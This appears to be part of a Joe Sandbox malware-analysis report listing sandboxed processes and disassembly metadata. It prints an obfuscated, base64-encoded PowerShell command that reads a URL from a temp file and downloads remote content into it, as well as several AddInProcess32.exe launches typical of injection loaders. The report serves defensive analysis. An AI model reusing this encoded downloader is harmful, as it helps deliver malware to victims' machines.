                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:02:43:03
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c
                                                                              Imagebase:0x7ff7c25b0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:02:43:04
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\PING.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                              Imagebase:0x7ff741e70000
                                                                              File size:22'528 bytes
                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:02:43:07
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                                                                              Imagebase:0x7ff6e3d50000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:02:43:18
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                              Imagebase:0x80000
                                                                              File size:43'008 bytes
                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:02:43:18
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                              Imagebase:0x850000
                                                                              File size:43'008 bytes
                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:02:43:18
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                              Imagebase:0xc80000
                                                                              File size:43'008 bytes
                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:02:43:18
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                              Imagebase:0x9c0000
                                                                              File size:43'008 bytes
                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:02:43:18
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                              Imagebase:0xe00000
                                                                              File size:43'008 bytes
                                                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Function 00007FFD342D37B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2405664254.00007FFD342D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd342d0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e99b89f687f3f6724d8ae340636a1cf9b72e181230606bc8b3d9a21e63b29c5
                                                                                • Instruction ID: b305c573b7fff09ba5f141c13be79a38c1b12b2725196de95cfa5cd7d9bedd74
                                                                                • Opcode Fuzzy Hash: 3e99b89f687f3f6724d8ae340636a1cf9b72e181230606bc8b3d9a21e63b29c5
                                                                                • Instruction Fuzzy Hash: 5001677121CB0D4FD744EF0CE451AA6B7E0FB99364F10056DE58AC3651D636E882CB45

                                                                                Non-executed Functions

                                                                                Function 00007FFD342D25EF Relevance: .2, Instructions: 234COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2405664254.00007FFD342D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ffd342d0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 393f1596e768829e6fb7072cbbb0748dbfb6278bbaa0371fa784f470513fdaa4
                                                                                • Instruction ID: d21c125554a8891b7adb497619ff8bb0a218038e0344a3a897443c90bc9a3420
                                                                                • Opcode Fuzzy Hash: 393f1596e768829e6fb7072cbbb0748dbfb6278bbaa0371fa784f470513fdaa4
                                                                                • Instruction Fuzzy Hash: 45717356A0F7C25FF76356385CBA0EA3FE4DF1326470901F7C694DA093ED1E1806A662

                                                                                Executed Functions

                                                                                Function 00007FFD3439243D Relevance: 27.5, Strings: 21, Instructions: 1259COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2377868138.00007FFD34390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34390000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd34390000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8?a$(8?a$08?a$88?a$@8?a$H8?a$P8?a$X8?a$`7?a$`8?a$h7?a$h8?a$p7?a$p8?a$x6?a$x6?a$x6?a$x7?a$x8?a$7?a$7?a
                                                                                • API String ID: 0-3062033246
                                                                                • Opcode ID: d8a52ddf36c2948422db6dc2f11071f0f559a1b780804d8c18c47f541e9f8d18
                                                                                • Instruction ID: ee3452e7c4b44f8579a9db08ca207c2c775648355059cbd3f0f5b28ed7590b47
                                                                                • Opcode Fuzzy Hash: d8a52ddf36c2948422db6dc2f11071f0f559a1b780804d8c18c47f541e9f8d18
                                                                                • Instruction Fuzzy Hash: 1CB22D70A0965D8FDBA5DF28C8657A9BBB1FF5A301F1001EAD04DE7292CA356E84CF01
                                                                                Function 00007FFD3439115D Relevance: 4.8, Strings: 2, Instructions: 2319COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2377868138.00007FFD34390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34390000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd34390000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 7?a$(7?a
                                                                                • API String ID: 0-1694188511
                                                                                • Opcode ID: 6f6608d8ad0c28ccd7ed17d9d9c8dd588efb711767f84ead544838849115d850
                                                                                • Instruction ID: 9a683086e62a30185a96844b09a3bd6b1fe88a1eeda678d3c79eb3e95414537a
                                                                                • Opcode Fuzzy Hash: 6f6608d8ad0c28ccd7ed17d9d9c8dd588efb711767f84ead544838849115d850
                                                                                • Instruction Fuzzy Hash: EAE22832B4DB894FEB96EB6848A56B57BE1EF57310B0801FBD18DD7193D928AC06C341
                                                                                Function 00007FFD3439335E Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2377868138.00007FFD34390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34390000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd34390000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: x6?a
                                                                                • API String ID: 0-3443701183
                                                                                • Opcode ID: 4c53a5818d7eeeb6245ca7df867f6b4f800ec61f3cab0e110fecb6aba930be4a
                                                                                • Instruction ID: 6b230cf5eecb362357d54862ff2d827716153870275a3cea828466a16467a5db
                                                                                • Opcode Fuzzy Hash: 4c53a5818d7eeeb6245ca7df867f6b4f800ec61f3cab0e110fecb6aba930be4a
                                                                                • Instruction Fuzzy Hash: 53B1BA70E19A5D8FDBA4EB68C899BA8B7B1FF59301F5001EAD00DE7262CA355D81CF01
                                                                                Function 00007FFD342C9CF9 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2376876506.00007FFD342C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd342c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `BP4
                                                                                • API String ID: 0-4067678288
                                                                                • Opcode ID: 1a26dca92f6ed0dfe9a3bdb727cf7212e7bc9fb017e60647f8f286fe587cbee1
                                                                                • Instruction ID: dadbb0d6888cd493ada219e847ef8c8c6f0be5861aa2921df4f6cf8d27d73987
                                                                                • Opcode Fuzzy Hash: 1a26dca92f6ed0dfe9a3bdb727cf7212e7bc9fb017e60647f8f286fe587cbee1
                                                                                • Instruction Fuzzy Hash: CF416C75E0864A8FDB55EF58D9A56EDB7E2FB59301F04013AD109F3291DE39A801DB80
                                                                                Function 00007FFD34393506 Relevance: .2, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2377868138.00007FFD34390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34390000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd34390000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d364d43031058e0de377c92d18e7bb09740165515d097da6b5119b7a71a042ab
                                                                                • Instruction ID: 9bd1b64692bcad9091ae7b9ca77400e451ab7db7a1184492018ca8ba54d19585
                                                                                • Opcode Fuzzy Hash: d364d43031058e0de377c92d18e7bb09740165515d097da6b5119b7a71a042ab
                                                                                • Instruction Fuzzy Hash: 0461CA70A1995C8FDBA4EB28C899BA9B7B1FF59301F5001E9D00DE7262CE346E85CF01
                                                                                Function 00007FFD342C9D38 Relevance: .1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2376876506.00007FFD342C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd342c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 789e95f04c91e4cf09e445ac4bfd87a2a69ab1428aed626f8caffd4deec3e072
                                                                                • Instruction ID: 2a2d5bd58d1408af2a4d5d0ba6f802ce24f5464c60b693c1abbb5b5f88107bee
                                                                                • Opcode Fuzzy Hash: 789e95f04c91e4cf09e445ac4bfd87a2a69ab1428aed626f8caffd4deec3e072
                                                                                • Instruction Fuzzy Hash: EC31BF75A0C68A8FDB5ADF64C8A56EDBBB1FF56310F04416FD009E7292CE396841CB81
                                                                                Function 00007FFD342D0C98 Relevance: .1, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2376876506.00007FFD342C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd342c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b90dc2be272837937c1d63c1a2178c0a4b75f79a0e2f5dbd8ae8ed10b30e1b49
                                                                                • Instruction ID: c95c105d364314bb572b26e5c2936927d5efc385ad2d135d972167a888bccd7e
                                                                                • Opcode Fuzzy Hash: b90dc2be272837937c1d63c1a2178c0a4b75f79a0e2f5dbd8ae8ed10b30e1b49
                                                                                • Instruction Fuzzy Hash: 7E41C434A1962D8FEBA4DF68C8547E9B6B1FF5A301F5000BAD11DE3291CA79A984DB40
                                                                                Function 00007FFD343948E3 Relevance: .1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2377868138.00007FFD34390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34390000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd34390000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2ab73e9dd15ed7a54e973a9f3e8d5dece3c3bfa86583b96ee788298091369318
                                                                                • Instruction ID: b7a074829a6360955cfffb3e4b91ed48b32f05ff32b8a5843581e9aec263976e
                                                                                • Opcode Fuzzy Hash: 2ab73e9dd15ed7a54e973a9f3e8d5dece3c3bfa86583b96ee788298091369318
                                                                                • Instruction Fuzzy Hash: E4117C31A486198FDB54EF64D4983FDB3B4EF56312F0001BAD10EE3181CB3A5A84DB00
                                                                                Function 00007FFD342C4295 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2376876506.00007FFD342C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd342c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                • Instruction ID: 3fa97d1d848c8b19b458e82c0022f737404a5021e70d3639eed96e83db85de07
                                                                                • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                • Instruction Fuzzy Hash: 4501A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052EE58AC3651DA36E881CB42
                                                                                Function 00007FFD3439490A Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2377868138.00007FFD34390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34390000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd34390000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d15d93e6e0c49f87d39f63fd0414810cc27dc059baeb7650e323d5bbb90c4cc9
                                                                                • Instruction ID: 8436b4f77cf1240fe539b22fbe24ea9bed89ce72e32ce13bd1d9b48c1af3ec59
                                                                                • Opcode Fuzzy Hash: d15d93e6e0c49f87d39f63fd0414810cc27dc059baeb7650e323d5bbb90c4cc9
                                                                                • Instruction Fuzzy Hash: 2111FA30A0561D8FDB69EF64D4983E9B3B4FB55312F0001AED11EE2291DB755A84CF01
                                                                                Function 00007FFD342C9E74 Relevance: .0, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2376876506.00007FFD342C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd342c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b8083fab37f98301af50b53c15728b5e60fce93f221dc16479beec1e26dd48b3
                                                                                • Instruction ID: e0e663e5030b6aa8e7f0a167ec7396a90a097a335498223a8c1718db011a638c
                                                                                • Opcode Fuzzy Hash: b8083fab37f98301af50b53c15728b5e60fce93f221dc16479beec1e26dd48b3
                                                                                • Instruction Fuzzy Hash: 2AF03C78E0C10ACBDB18DE54C5A18BEB7B6EB99311F10412DC10AE3281DE396942DF84
                                                                                Function 00007FFD342C9CA9 Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2376876506.00007FFD342C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd342c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b0cef12cf3ff2f3255284bf7867f6fb9099d9433296cad25813c6473a2ccf4f7
                                                                                • Instruction ID: 6c9e03a0b4120aaa58b0b147e4caa099c5a9b8e2e822d43d204e553f35604cbd
                                                                                • Opcode Fuzzy Hash: b0cef12cf3ff2f3255284bf7867f6fb9099d9433296cad25813c6473a2ccf4f7
                                                                                • Instruction Fuzzy Hash: 9CD09235E0882DCF8F50EFD8D8541ECB7B0FB68311B040126E509E7104D730A8118B50

                                                                                Non-executed Functions

                                                                                Function 00007FFD34390FC5 Relevance: .1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2377868138.00007FFD34390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34390000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd34390000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f9457478a277374ef140cbbf7bca4b7ccf08b88ef070216b880e37096035bbbb
                                                                                • Instruction ID: 589e35d15f25994c7fc40eee539a7b21d15cc2c13e8fb03dbb48f50e0dc3ce55
                                                                                • Opcode Fuzzy Hash: f9457478a277374ef140cbbf7bca4b7ccf08b88ef070216b880e37096035bbbb
                                                                                • Instruction Fuzzy Hash: 6921A15294E7D55FE753673808B52547FB0AF13200B0E05EFC184DB2E3D95D180AD352
                                                                                Function 00007FFD342CD7F8 Relevance: .1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2376876506.00007FFD342C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd342c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 852670964c2a0d67d0f36a57b7d3f2bf24b178f638b42ee99a3803d22b772c30
                                                                                • Instruction ID: 5587f5c6853c20ed026f0903c0b2b05850cfb87858292b14bd488842051962ab
                                                                                • Opcode Fuzzy Hash: 852670964c2a0d67d0f36a57b7d3f2bf24b178f638b42ee99a3803d22b772c30
                                                                                • Instruction Fuzzy Hash: 9921AC2094E3C55FD7538B6088742E97FB0AF03310F0946EBC085DB0E3DA6D990AD712
                                                                                Function 00007FFD342CACD5 Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2376876506.00007FFD342C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ffd342c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46c50c0522aacb5d18338905d9a843d8520487bf2ebf3a00b6346d64ba354e1b
                                                                                • Instruction ID: 82672240cb4cfafa4d02d6c2717fceb37d538fa2591bcd8c34ecb7e973c4b8ef
                                                                                • Opcode Fuzzy Hash: 46c50c0522aacb5d18338905d9a843d8520487bf2ebf3a00b6346d64ba354e1b
                                                                                • Instruction Fuzzy Hash: 4301F234A1D2899FE7269B24D9647FAB7B5EF43301F06067AD405E71D2DEBC6A08C381

                                                                                Executed Functions

                                                                                Function 00007FFD342D37B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2237641695.00007FFD342D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffd342d0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                • Instruction ID: b305c573b7fff09ba5f141c13be79a38c1b12b2725196de95cfa5cd7d9bedd74
                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                • Instruction Fuzzy Hash: 5001677121CB0D4FD744EF0CE451AA6B7E0FB99364F10056DE58AC3651D636E882CB45